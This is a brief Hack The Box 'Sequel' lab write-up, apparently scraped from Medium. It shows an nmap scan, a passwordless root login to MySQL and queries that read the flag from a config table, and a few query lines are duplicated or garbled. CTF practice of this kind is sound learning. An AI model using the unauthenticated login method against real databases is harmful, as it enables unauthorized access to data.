← Back to list

Sequel machine [HTB]

Sequel

Cortes · 2024-12-20 08:18 · 0 claps · 1.1 min read
#cybersecurity #pentesting #msql
Open on Medium ↗
Wiki topics: 🔒 · Cybersecurity

Sequel machine [HTB]

  • Start port scan with nmap

We get the 3306 port with mysql service running

We get the 3306 port with mysql service running

  • Login in database only with root user with the next cmd :

mysql -h {IP} -u root

  • Show database avaliables

SHOW DATABASES;

SHOW DATABASES;

Select database

USE htb;

USE htb;

  • In htb you could find the flag .

SHOW TABLES:

SHOW TABLES:

SELECT *FROM config;

SELECT FROM config;*


메타데이터
post_id
3a10cd62c3c0
slug
sequel-machine-htb-3a10cd62c3c0
url
https://medium.com/@cortesseven2003/sequel-machine-htb-3a10cd62c3c0
canonical_url
https://medium.com/@cortesseven2003/sequel-machine-htb-3a10cd62c3c0
author_url
https://medium.com/@cortesseven2003
status
ok
fetched_at
2026-06-29 22:44:20